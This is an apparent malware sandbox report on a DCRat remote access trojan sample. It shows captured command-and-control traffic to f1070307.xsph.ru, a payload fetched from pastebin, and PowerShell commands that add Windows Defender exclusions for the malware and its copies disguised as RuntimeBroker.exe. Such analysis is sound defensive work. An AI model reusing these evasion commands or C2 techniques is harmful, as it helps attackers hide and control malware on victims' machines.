Jan 3, 2025 00:28:47.255505085 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	50023	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:52.271641016 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:52.947325945 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	50024	141.8.192.151	80	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 00:28:58.603311062 CET	3909	OUT	GET /3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenWg8vyYrBX2ItcmNmaz=CSRWJo8XPe0zU&a01041a9785af2a79745f1955436c099=5cTO3E2M0kTM4gDO3MzYlhzY1UDO2QjM2gTN5QjNlFmNzYjZxcjMldTO3gDOwUDOyYTM2gTN&6cf4e82f6b2961308157eadafeeff42f=gZlVmY0cDZ2M2Y2ETY5UjNwgzM3kjM5QWZiNDZ2UzNyMmN4QzMmR2N&a4c286f08168d92289642df8e1d0f285=d1nI2YWYiZDO4IGOklDZmZTOkNTZkhTMhJTYjZWNiZDO2MGNyMmZ2YWO4IiOiQzN4ATY4IDOycTYmZjZmZGOkFWO4ATZilzY4ATY1gDMiwiIiRWM1UTMhRmN1QjN0Y2M3AzN4kDZiRWYiBTM4kDMzEjM5YDNzYGMkJiOiM2N2EWMzQWMiFDZ4QmYjBDNxYWN3ATNykzM0MDZ0IjNis3W&7603066d178d57644cba1e85f0eb372c=QX9JiI6IiMjFWN0cjNkFzY3ATY0U2MiNTMlVDZmJmZhhTZ0gTYhJCLiYjZhJmN4gjY4QWOkZmN5Q2MlRGOxEmMhNmZ1ImN4YzY0IzYmZjZ5gjI6ICN3gDMhhjM4IzNhZmNmZmZ4QWY5gDMlJWOjhDMhVDOwICLiIGZxUTNxEGZ2UDN2QjZzcDM3gTOkJGZhJGMxgTOwMTMykjN0MjZwQmI6IyY3YTYxMDZxIWMkhDZiNGM0EjZ1cDM1ITOzQzMkRjM2Iyes0nIRZWOKlGVp9maJBTVq5kaKJTTqJ1ROxmVU5kMJd0TppkaNxGZUlVNrRlW3lkeOlmWX10MrRVW0EkaZNzaq5EeJNETpRzaJZTSD9UeRJTWxEleZp3aUllaCRVW3FleZVTQEpVbWdVT4V0RNh3ZUl1dZJjTwUVbOhmRXlFNFpmWpdXa [TRUNCATED] Accept: / Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: f1070307.xsph.ru
Jan 3, 2025 00:28:59.315519094 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 23:28:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 5a 78 51 57 4d 35 41 6a 4d 31 4d 47 5a 6a 56 6a 5a 7a 45 6d 5a 68 42 54 4e 6d 64 7a 4d 77 49 44 4d 69 4a 57 4e 68 52 54 4e 30 49 79 65 36 49 79 4d 33 63 7a 59 33 49 57 4e 77 4d 44 4f 6b 52 6a 4d 6a 56 57 4d 32 4d 6a 5a 32 67 6a 4d 6c 42 6a 4e 6b 4e 32 4e 78 51 57 5a 6c 4a 79 65 Data Ascii: ==Qf9JiI6ICZxQWM5AjM1MGZjVjZzEmZhBTNmdzMwIDMiJWNhRTN0Iye6IyM3czY3IWNwMDOkRjMjVWM2MjZ2gjMlBjNkN2NxQWZlJye

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.20.4.235	443	7812	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 23:27:11 UTC	201	OUT	GET /raw/5YGpPGYJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: pastebin.com Connection: Keep-Alive
2025-01-02 23:27:12 UTC	391	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 23:27:12 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Thu, 02 Jan 2025 23:27:12 GMT Server: cloudflare CF-RAY: 8fbe84b2ed530f75-EWR
2025-01-02 23:27:12 UTC	404	IN	Data Raw: 31 38 64 0d 0a 50 54 31 52 5a 6d 6b 77 61 7a 77 67 63 44 4d 71 57 46 38 77 50 45 38 6a 49 53 45 35 50 6a 41 75 4b 53 42 75 4c 6c 34 6d 4d 79 77 74 4e 57 42 4f 51 44 78 45 50 44 4d 2b 4b 6a 78 2b 4f 57 41 75 4f 7a 34 6f 49 7a 41 6c 66 6e 77 37 66 47 6b 38 66 43 42 44 4c 6d 6b 77 61 7a 77 67 63 44 4d 71 57 46 38 77 50 45 38 6a 49 53 45 35 50 6a 41 75 4b 53 42 75 4c 6c 34 6d 4d 79 77 74 4e 57 42 4f 51 44 78 45 50 44 4d 2b 4b 6a 78 2b 4f 57 41 75 4f 7a 34 6f 49 7a 41 6c 66 6e 77 37 66 46 4d 38 66 43 42 67 4a 41 3d 3d 2e 3d 3d 51 66 69 41 6d 49 36 49 53 65 69 77 69 49 6c 49 69 4f 69 67 6d 49 73 49 79 4f 69 6f 6a 49 32 49 43 4c 69 41 6b 49 36 49 79 64 69 77 69 49 66 4a 69 4f 69 77 6d 49 73 49 43 4b 69 6f 6a 49 49 4a 43 4c 69 51 69 49 36 49 53 5a 69 77 69 49 73 Data Ascii: 18dPT1RZmkwazwgcDMqWF8wPE8jISE5PjAuKSBuLl4mMywtNWBOQDxEPDM+Kjx+OWAuOz4oIzAlfnw7fGk8fCBDLmkwazwgcDMqWF8wPE8jISE5PjAuKSBuLl4mMywtNWBOQDxEPDM+Kjx+OWAuOz4oIzAlfnw7fFM8fCBgJA==.==QfiAmI6ISeiwiIlIiOigmIsIyOiojI2ICLiAkI6IydiwiIfJiOiwmIsICKiojIIJCLiQiI6ISZiwiIs
2025-01-02 23:27:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	18:26:54
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\ogVinh0jhq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ogVinh0jhq.exe"
Imagebase:	0xc0000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1679368399.0000000002700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1679368399.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1681720996.00000000125CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:26:56
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:26:56
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:26:56
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:26:56
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:26:57
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe
Imagebase:	0x830000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2913632595.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	18:26:57
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe
Imagebase:	0xf00000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000009.00000002.2208718575.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:26:57
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\ogVinh0jhq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ogVinh0jhq.exe"
Imagebase:	0x790000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1725669334.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1725669334.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000A.00000002.1725669334.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:26:59
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe
Wow64 process (32bit):	false
Commandline:	C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe
Imagebase:	0x290000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2228709323.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2228709323.00000000025FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:27:00
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe
Wow64 process (32bit):	false
Commandline:	C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe
Imagebase:	0x200000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.2216061800.000000000262E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000F.00000002.2216061800.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:27:00
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 8112, Parent PID: 7844

General

Target ID:	17
Start time:	18:27:00
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:27:00
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:27:00
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:27:01
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:27:01
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat"
Imagebase:	0x7ff7c7020000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:27:01
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:27:02
Start date:	02/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff645c90000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:27:07
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\ogVinh0jhq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\ogVinh0jhq.exe"
Imagebase:	0xa90000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.1880725474.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000018.00000002.1880725474.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:27:08
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe"
Imagebase:	0x740000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.1893760638.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:27:16
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Imagebase:	0x80000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.1978274690.000000000234D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001B.00000002.1978274690.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:27:24
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe"
Imagebase:	0x5d0000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.2062337075.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	18:27:33
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Imagebase:	0xcf0000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001F.00000002.2153003374.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:27:41
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe"
Imagebase:	0x7ff6c1d90000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000020.00000002.2233192227.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:27:50
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Imagebase:	0xb20000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2311289217.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.2311289217.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:28:14
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Imagebase:	0xea0000
File size:	1'453'056 bytes
MD5 hash:	11233270109A3D109A5E332C13C47F86
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2540068591.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.2540068591.0000000003371000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Function 00007FFD9B8B3545 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

V_H, xrefs: 00007FFD9B8B35CD

Memory Dump Source

Source File: 00000000.00000002.1710818366.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: V_H
API String ID: 0-105569101
Opcode ID: 9e0bfdf55edba0aa80fd113edde08afa03ea83f7aeff2f1678dc071ea1950d04
